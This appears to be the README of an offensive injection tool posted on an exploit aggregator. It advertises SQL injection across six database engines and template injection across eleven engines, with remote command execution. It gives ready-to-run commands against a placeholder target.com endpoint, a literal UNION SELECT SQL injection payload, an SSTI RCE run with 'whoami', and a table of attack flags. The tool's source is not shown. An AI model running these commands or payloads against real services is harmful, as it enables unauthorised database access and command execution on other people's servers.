## https://sploitus.com/exploit?id=FF45EECE-67D6-5704-883B-9A438A776CE6
# Injection Exploit
SQLi (6 engines) + SSTI (11 engines) via GET/POST.
```
pip install requests
```
```
# POST (default): sends the payload in the request body
python exploit.py --url https://target.com/api/endpoint
python exploit.py --url https://target.com/api/endpoint --mode sqli --db mysql
# GET: appends the payload as a query string
python exploit.py --url https://target.com/api/endpoint --method GET
python exploit.py --url https://target.com/api/endpoint --method GET --mode sqli --db mysql
# SSTI RCE
python exploit.py --url https://target.com/api/endpoint --mode ssti-rce --cmd "whoami"
# Custom target parameter and payload
python exploit.py --url https://target.com/api/endpoint --inject qqq --method GET
python exploit.py --url https://target.com/api/endpoint --mode single --value "1' UNION SELECT @@version--"
```
| Flag        | Default                | Description                            |
|-------------|------------------------|----------------------------------------|
| `--url`     | (required)             | Target URL (full endpoint)             |
| `--params`  | `kali=0&qq=0&qqq=kali` | Request params                         |
| `--inject`  | `kali`                 | Parameter to inject                    |
| `--method`  | `POST`                 | GET or POST                            |
| `--format`  | `json`                 | json/form/xml                          |
| `--db`      | all                    | mysql/mssql/postgres/oracle/sqlite     |
| `--mode`    | `auto`                 | detect/sqli/ssti/ssti-rce/single       |
| `--cmd`     | `id`                   | Command for RCE                        |
| `--timeout` | 15                     | Request timeout                        |